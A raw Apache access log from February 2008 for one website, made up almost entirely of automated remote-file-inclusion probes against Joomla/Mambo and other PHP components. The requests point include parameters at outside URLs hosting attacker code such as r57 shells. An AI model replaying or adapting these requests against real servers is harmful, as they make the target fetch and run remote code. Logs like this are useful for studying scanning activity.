87.106.48.129 - - [25/Feb/2008:05:26:37 -0800] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.48.129 - - [25/Feb/2008:05:26:43 -0800] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.48.129 - - [25/Feb/2008:05:26:43 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.147.161.250 - - [25/Feb/2008:05:27:26 -0800] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ilegais.xpg.com.br/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
213.147.161.250 - - [25/Feb/2008:05:27:27 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ilegais.xpg.com.br/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
213.147.161.250 - - [25/Feb/2008:05:27:28 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ilegais.xpg.com.br/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
72.233.6.152 - - [25/Feb/2008:05:27:31 -0800] "GET /squirrelcart/popup_window.php?site_isp_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.7.68 - - [25/Feb/2008:05:28:27 -0800] "GET /logs/%3Ehttp://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
211.233.7.68 - - [25/Feb/2008:05:28:27 -0800] "GET /%3Ehttp://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:05:29:13 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:05:29:42 -0800] "GET /logs/access_080201.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:05:29:42 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.85.129 - - [25/Feb/2008:05:29:48 -0800] "GET /logs/access_080123.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:05:29:48 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.85.129 - - [25/Feb/2008:05:29:48 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [25/Feb/2008:05:29:48 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:05:30:00 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:05:30:02 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:05:30:13 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:05:30:15 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.7.68 - - [25/Feb/2008:05:30:16 -0800] "GET /logs/index.php?go=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
211.233.7.68 - - [25/Feb/2008:05:30:17 -0800] "GET /index.php?go=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:05:31:06 -0800] "GET /logs//update/update2.php?lang=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:05:31:06 -0800] "GET //update/update2.php?lang=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
213.147.161.250 - - [25/Feb/2008:05:31:59 -0800] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ilegais.xpg.com.br/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
60.248.89.72 - - [25/Feb/2008:05:33:02 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://cfemp.com/pdf/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
60.248.89.72 - - [25/Feb/2008:05:33:02 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://cfemp.com/pdf/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
222.239.78.91 - - [25/Feb/2008:05:35:21 -0800] "GET /logs/access.log/index.php?_REQUEST=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.239.78.91 - - [25/Feb/2008:05:35:22 -0800] "GET /index.php?_REQUEST=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.239.78.91 - - [25/Feb/2008:05:35:22 -0800] "GET /logs/index.php?_REQUEST=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:05:35:26 -0800] "GET /logs/access_080121.log//modules/TotalCalendar/about.php?inc_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:05:35:27 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:35:27 -0800] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:05:35:27 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:35:27 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:35:28 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:05:35:34 -0800] "GET /logs/access_080121.log//modules/TotalCalendar/about.php?inc_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:05:35:34 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:05:35:35 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:05:36:04 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:05:36:04 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:05:36:22 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:05:36:22 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:05:36:22 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:05:36:24 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.35.158.181 - - [25/Feb/2008:05:36:39 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.35.158.180 - - [25/Feb/2008:05:36:40 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.35.158.180 - - [25/Feb/2008:05:36:41 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.135.33.135 - - [25/Feb/2008:05:36:59 -0800] "GET /logs/access.log/lang=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.135.33.135 - - [25/Feb/2008:05:36:59 -0800] "GET /lang=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.135.33.135 - - [25/Feb/2008:05:36:59 -0800] "GET /logs/lang=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.135.33.135 - - [25/Feb/2008:05:37:02 -0800] "GET /logs/access_080201.log/lang=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.135.33.135 - - [25/Feb/2008:05:37:26 -0800] "GET /lang=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.129.226 - - [25/Feb/2008:05:38:06 -0800] "GET /index.php?page=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:05:38:07 -0800] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.129.226 - - [25/Feb/2008:05:38:07 -0800] "GET /logs/index.php?page=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:05:38:07 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:05:38:07 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.129.226 - - [25/Feb/2008:05:38:40 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
85.13.129.226 - - [25/Feb/2008:05:38:42 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
189.19.29.139 - - [25/Feb/2008:05:38:49 -0800] "GET /?mosConfig_absolute_path=http://h1.ripway.com/splinterox/r57.txt?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.9.138 - - [25/Feb/2008:05:39:18 -0800] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.23.150 - - [25/Feb/2008:05:40:08 -0800] "GET /logs/access_080124.log HTTP/1.0" 200 713220 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.239.78.91 - - [25/Feb/2008:05:40:23 -0800] "GET /logs/access_071230.log/index.php?_REQUEST=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.23.70 - - [25/Feb/2008:05:41:02 -0800] "GET /bikes/dteel/03MAR07/?N=D HTTP/1.0" 200 692 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:05:41:12 -0800] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:05:42:01 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:42:06 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:42:08 -0800] "GET /modifyform.html?code=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:42:08 -0800] "GET /logs/modifyform.html?code=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:05:42:10 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:42:14 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:42:18 -0800] "GET /modifyform.html?code=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:42:21 -0800] "GET /logs/modifyform.html?code=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.209.207 - - [25/Feb/2008:05:42:50 -0800] "GET /presto/?S=D HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:42:52 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.28.140 - - [25/Feb/2008:05:42:58 -0800] "GET /logs/access_070803.log HTTP/1.0" 200 56048 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:43:02 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:05:43:09 -0800] "GET /logs/access_071230.log/index.php?lang=gr&filehttp://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:05:43:10 -0800] "GET /index.php?lang=gr&filehttp://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:05:43:10 -0800] "GET /logs/index.php?lang=gr&filehttp://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
130.161.158.3 - - [25/Feb/2008:05:43:38 -0800] "GET /logs/modifyform.html?code=http://arcadiaz.free.fr/map/mambo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
130.161.158.3 - - [25/Feb/2008:05:43:38 -0800] "GET /modifyform.html?code=http://arcadiaz.free.fr/map/mambo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:05:46:10 -0800] "GET /logs//crontab/run_billing.php?config[include_dir]=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:05:46:10 -0800] "GET //crontab/run_billing.php?config[include_dir]=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
85.214.93.154 - - [25/Feb/2008:05:47:44 -0800] "GET /logs/squirrelcart/popup_window.php?site_isp_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.93.154 - - [25/Feb/2008:05:47:44 -0800] "GET /squirrelcart/popup_window.php?site_isp_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.106.146.169 - - [25/Feb/2008:05:48:33 -0800] "GET /logs/access_080201.log/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.106.146.169 - - [25/Feb/2008:05:48:33 -0800] "GET /logs/access_080201.log/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.106.146.169 - - [25/Feb/2008:05:48:33 -0800] "GET /logs/access_080201.log/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.106.146.169 - - [25/Feb/2008:05:48:33 -0800] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.106.146.169 - - [25/Feb/2008:05:48:33 -0800] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.106.146.169 - - [25/Feb/2008:05:48:33 -0800] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.106.146.169 - - [25/Feb/2008:05:48:33 -0800] "GET /logs/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.106.146.169 - - [25/Feb/2008:05:48:33 -0800] "GET /logs/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.106.146.169 - - [25/Feb/2008:05:48:33 -0800] "GET /logs/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.0.130 - - [25/Feb/2008:05:50:30 -0800] "GET /logs/?mosConfig_absolute_path=http://www.syshd.de/cache/%20%20%20%20%20%20%20/isis.txt? HTTP/1.1" 200 36116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
208.116.0.130 - - [25/Feb/2008:05:50:30 -0800] "GET /?mosConfig_absolute_path=http://www.syshd.de/cache/%20%20%20%20%20%20%20/isis.txt? HTTP/1.1" 200 3094 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:05:51:20 -0800] "GET /logs/access_080201.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:05:51:21 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:05:51:51 -0800] "GET /logs/access_080131.log/index.php?lang=gr&filehttp://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.147.236.10 - - [25/Feb/2008:05:52:26 -0800] "GET /index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
217.147.236.10 - - [25/Feb/2008:05:52:26 -0800] "GET /logs/index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.143.84.82 - - [25/Feb/2008:05:52:29 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:05:52:30 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.9.138 - - [25/Feb/2008:05:52:59 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.69.192.133 - - [25/Feb/2008:05:53:05 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.96.247.163 - - [25/Feb/2008:05:53:16 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.96.247.163 - - [25/Feb/2008:05:53:17 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.96.247.163 - - [25/Feb/2008:05:53:17 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.31.30.226 - - [25/Feb/2008:05:54:34 -0800] "GET /logs/access_080121.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.31.30.226 - - [25/Feb/2008:05:54:41 -0800] "GET /logs/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:05:54:45 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
